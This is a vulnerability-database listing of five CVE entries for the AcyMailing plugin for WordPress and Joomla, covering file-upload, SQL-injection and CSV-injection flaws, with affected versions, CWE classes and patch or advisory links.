CVE-2024-7384 – AcyMailing <= 9.7.2 - Authenticated (Subscriber+) Arbitrary File Upload via acym_extractArchive Function
https://notcve.org/view.php?id=CVE-2024-7384
The AcyMailing – An Ultimate Newsletter Plugin and Marketing Automation Solution for WordPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the acym_extractArchive function in all versions up to, and including, 9.7.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. • https://plugins.trac.wordpress.org/browser/acymailing/trunk/back/libraries/wordpress/file.php#L47 https://plugins.trac.wordpress.org/changeset/3137644 https://plugins.trac.wordpress.org/changeset?old_path=%2Facymailing&old=3118953&new_path=%2Facymailing&new=3137644&sfp_email=&sfph_mail= https://wordpress.org/plugins/acymailing/#developers https://www.acymailing.com/changelog https://www.wordfence.com/threat-intel/vulnerabilities/id/0c747bc9-582c-4b9f-85a4-469c446d50f5?source=cve • CWE-434: Unrestricted Upload of File with Dangerous Type •
CVE-2023-39970 – Extension - acymailing.com - RCE in AcyMailing component for Joomla 6.7.0-8.5.0
https://notcve.org/view.php?id=CVE-2023-39970
Unrestricted Upload of File with Dangerous Type vulnerability in AcyMailing component for Joomla. It allows remote code execution. Vulnerabilidad de carga no restringida de archivos de tipo peligroso en el componente AcyMailing para Joomla. Permite la ejecución remota de código. • https://extensions.joomla.org/extension/acymailing-starter • CWE-434: Unrestricted Upload of File with Dangerous Type •
CVE-2020-10934
https://notcve.org/view.php?id=CVE-2020-10934
Acyba AcyMailing before 6.9.2 mishandles file uploads by admins. Acyba AcyMailing versiones anteriores a la versión 6.9.2, maneja inapropiadamente archivos cargados por administradores. • http://jvn.jp/en/jp/JVN56890693/index.html https://www.acyba.com/acymailing/68-acymailing-changelog.html?Itemid=329 • CWE-434: Unrestricted Upload of File with Dangerous Type •
CVE-2015-7338
https://notcve.org/view.php?id=CVE-2015-7338
SQL Injection exists in AcyMailing Joomla Component before 4.9.5 via exportgeolocorder in a geolocation_longitude request to index.php. Se presenta una Inyección SQL en AcyMailing Joomla Component versiones anteriores a 4.9.5, por medio de exportgeolocorder en una petición de la función geolocation_longitude en el archivo index.php. • https://labs.integrity.pt/advisories/cve-2015-7338 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVE-2018-9107 – Joomla! Component Acymailing Starter 5.9.5 - CSV Macro Injection
https://notcve.org/view.php?id=CVE-2018-9107
CSV Injection (aka Excel Macro Injection or Formula Injection) exists in the export feature in the Acyba AcyMailing extension before 5.9.6 for Joomla! via a value that is mishandled in a CSV export. Existe inyección CSV (también conocida como Excel Macro Injection o Formula Injection) en la funcionalidad de exportación en la extensión Acyba AcyMailing , en versiones anteriores a la 5.9.6, para Joomla! mediante un valor gestionado de manera incorrecta en una exportación CSV. Joomla Acymailing Starter component version 5.9.5 suffers from a CSV macro injection vulnerability. • https://www.exploit-db.com/exploits/44369 https://vel.joomla.org/articles/2140-introducing-csv-injection https://vel.joomla.org/resolved/2136-acymailing-5-9-5-csv-injection https://www.acyba.com/acymailing/change-log.html • CWE-1236: Improper Neutralization of Formula Elements in a CSV File •